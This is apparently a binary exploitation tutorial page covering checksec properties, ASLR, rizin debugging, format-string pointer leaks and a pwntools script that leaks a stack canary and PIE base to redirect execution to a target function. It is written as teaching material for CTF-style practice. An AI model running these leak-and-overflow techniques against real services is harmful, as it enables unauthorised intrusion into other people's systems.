Exploit Notes

Binary Exploitation

Last modified: 2023-03-20

Reverse Engineering

Binary Exploitation is the process of finding vulnerabilities in a binary file.

Prerequisites

This post uses “rizin” for dynamic analysis, and the “pwntools” Python package is useful for binary exploitation.


Investigation

Basic

file ./example
strings ./example

objdump -d ./example
# -M intel: disassemble in Intel syntax instead of AT&T syntax
objdump -M intel -d ./example

Security Properties

First check the executable properties.

checksec --file=./example
  • RELRO (stands for Relocation Read-Only)

    • Partial RELRO - We can still read and write the global offset table (GOT).
    • Full RELRO - We can only read the global offset table, so the GOT cannot be overwritten.
  • STACK CANARY

    • No canary found - The stack is not protected against buffer overflows.
  • NX (stands for Non-eXecutable segments)

    • NX enabled - We cannot execute custom shellcode placed on the stack.
  • PIE (stands for Position Independent Executable)

    • No PIE - The binary is always loaded at the same address.
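The four properties in that list can be read straight from the ELF headers. As an added example (not part of these notes or of checksec itself), the standard-library-only Python below reimplements the checks for little-endian ELF64 files and builds a constructed, non-runnable skeleton ELF so the checker can be exercised offline. The canary check is a heuristic: it looks for the name of the imported “__stack_chk_fail” routine in the file, which is also how checksec decides.

```python
import struct

PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO, PF_X, ET_DYN = 2, 0x6474E551, 0x6474E552, 1, 3
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1, DF_BIND_NOW, DF_1_NOW = 0, 24, 30, 0x6FFFFFFB, 0x8, 0x1
PHDR = "<IIQQQQQQ"  # p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align

def program_headers(data):
    """Return every program header of an ELF64 file as an unpacked tuple."""
    (e_phoff,) = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    return [struct.unpack_from(PHDR, data, e_phoff + i * e_phentsize) for i in range(e_phnum)]

def dynamic_tags(data, phdrs):
    """Collect {d_tag: d_val} from the PT_DYNAMIC segment ({} for static binaries)."""
    tags = {}
    for p_type, _, p_offset, _, _, p_filesz, _, _ in phdrs:
        if p_type == PT_DYNAMIC:
            for off in range(p_offset, p_offset + p_filesz, 16):
                tag, val = struct.unpack_from("<qQ", data, off)
                if tag == DT_NULL:
                    break
                tags[tag] = val
    return tags

def checksec(data):
    """Derive RELRO / Canary / NX / PIE from the headers, the way checksec reports them."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a little-endian ELF64 file")
    (e_type,) = struct.unpack_from("<H", data, 16)
    phdrs = program_headers(data)
    tags = dynamic_tags(data, phdrs)
    has_relro = any(t == PT_GNU_RELRO for t, *_ in phdrs)  # a read-only region exists
    bind_now = DT_BIND_NOW in tags or tags.get(DT_FLAGS, 0) & DF_BIND_NOW or tags.get(DT_FLAGS_1, 0) & DF_1_NOW
    return {
        "RELRO": "Full" if has_relro and bind_now else "Partial" if has_relro else "No",
        "Canary": b"__stack_chk_fail" in data,  # heuristic: name of the imported guard-failure routine
        "NX": any(t == PT_GNU_STACK and not f & PF_X for t, f, *_ in phdrs),  # stack segment without PF_X
        "PIE": e_type == ET_DYN,  # simplified: shared objects are ET_DYN as well
    }

def build_sample_elf(nx=True, full_relro=True, pie=True, canary=True):
    """Construct a skeletal ELF64 (headers plus a tiny dynamic section, not runnable) for testing."""
    phdrs = [(PT_GNU_STACK, 0 if nx else PF_X), (PT_GNU_RELRO, 0), (PT_DYNAMIC, 0)]
    dyn_off = 64 + 56 * len(phdrs)  # dynamic section follows the ELF header and program headers
    dyn = struct.pack("<qQ", DT_FLAGS, DF_BIND_NOW if full_relro else 0) + struct.pack("<qQ", DT_NULL, 0)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)  # ELFCLASS64, little-endian, version 1
    hdr = ident + struct.pack("<HHIQQQIHHHHHH", ET_DYN if pie else 2, 0x3E, 1, 0, 64, 0, 0, 64, 56, len(phdrs), 0, 0, 0)
    body = b"".join(struct.pack(PHDR, t, f, dyn_off if t == PT_DYNAMIC else 0, 0, 0, len(dyn) if t == PT_DYNAMIC else 0, 0, 0) for t, f in phdrs)
    return hdr + body + dyn + (b"__stack_chk_fail\0" if canary else b"")
```

Run it against a real file with checksec(open("./example", "rb").read()); build_sample_elf() only exists so the checker can be tried without a binary at hand.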

ASLR (Address Space Layout Randomization) in Machine

ASLR is a security technique that randomizes where memory regions are placed, which makes memory corruption vulnerabilities harder to exploit.

cat /proc/sys/kernel/randomize_va_space
2
  • 0 - The address space is NOT randomized.
  • 1 - The address space is randomized (stack, shared libraries and mmap regions).
  • 2 - The address space is randomized, and the data segment (brk heap) as well.

Debugging

1. Start Debugger

# Make the binary executable so the debugger can run it
chmod +x example

# -d: Debug mode
rizin -d example

2. Analyzing

# Analyze everything: calls, references, emulation, and apply signatures
[0x0000]> aaa

3. List functions

# List functions
[0x0000]> afl
[0x0000]> afl | grep main

4. Disassemble & Decompile Functions

# Disassemble the function
[0x0000]> pdf @ main
[0x0000]> pd @ main
# Disassemble the first 50 lines
[0x0000]> pd 50 @ main

# Decompile the function (the ghidra plugin required)
[0x0000]> pdg @ main

To decompile with the “pdg” command as above, the “rizin-plugin-ghidra” package is required; install it by running the following command.

sudo apt install rizin-plugin-ghidra

Format String (Pointer)

./example

Type something:
>> %2$p
The result is 0x555a18ae6365

Exploitation Examples

# Brute force pointer: leak the positional arguments 20 down to 1 one by one
for i in {20..1}; do echo \%$i\$p | ./example; done

# Brute force pointer & cut & hexdump (reverse) & reverse
# cut -c 15-: Keep characters from position 15 to the end of the line ("The result is " is 14 characters)
# xxd -ps: Plain hexdump style (no offsets or ASCII column)
# xxd -r: Reverse operation. Convert the hexdump into binary
# rev: Reverse the line characterwise (undoes the little-endian byte order of the leaked values)
(for i in {11..6..-1}; do echo \%$i\$p | ./example; done) | grep "The result is" | cut -c 15- | xxd -ps -r | rev

Bypass Canary Protection

from pwn import *

context.update(arch="amd64", os="linux")

filepath = "./example"
elf = context.binary = ELF(filepath)

p = process(filepath)  # p = remote("example.com", 1337) for a remote connection

# We need to find the stack canary. Its lowest byte is always 0x00, so the leaked value ends with "00".
# To find the right argument positions, execute p.sendline(b"%p %p %p %p ...") first.
p.sendline(b"%10$p %13$p")
p.recvuntil(b"result: ")
leaked = p.recvline().split()
print(leaked)
base = int(leaked[0], 16) - 0xa90  # leaked code pointer minus its offset from the PIE base
canary = int(leaked[1], 16)
elf.address = base  # now elf.sym[...] resolves to runtime addresses

payload = b"A" * 24           # fill the buffer up to the canary
payload += p64(canary)        # write the canary back unchanged so the check passes
payload += b"B" * 8           # saved rbp
payload += p64(base + 0x6fe)  # address inside the binary (offset specific to this target)
payload += p64(elf.sym["target_func"])

p.sendline(payload)
p.interactive()
